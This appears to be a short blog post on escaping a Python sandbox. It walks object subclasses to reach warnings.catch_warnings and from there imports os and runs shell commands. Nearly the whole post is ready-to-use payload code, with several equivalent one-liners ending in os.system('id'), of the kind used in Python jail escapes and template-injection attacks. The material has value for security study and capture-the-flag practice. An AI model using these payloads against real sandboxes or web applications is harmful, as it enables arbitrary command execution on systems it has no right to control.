The key idea is obtaining the <warnings.catch_warnings> class
# try to get <class 'warnings.catch_warnings'> for i, j in enumerate({}.__class__.__base__.__subclasses__()): print(i, j) # or another alternative way print([c for c in {}.__class__.__base__.__subclasses__() if c.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os')) # The 59 here is warnings.catch_warnings w = ().__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os') w.system("id") w = [].__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os') w.system("id") w = {}.__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os') w.system("id") w = ().__class__.__base__.__subclasses__()[59].__init__.func_globals["linecache"].__dict__["os"] w.system("id") w = [].__class__.__base__.__subclasses__()[59].__init__.func_globals["linecache"].__dict__["os"] w.system("id") w = {}.__class__.__base__.__subclasses__()[59].__init__.func_globals["linecache"].__dict__["os"] w.system("id") # all of the aboves are equivalent to import os os.system("id")
No comments:
Post a Comment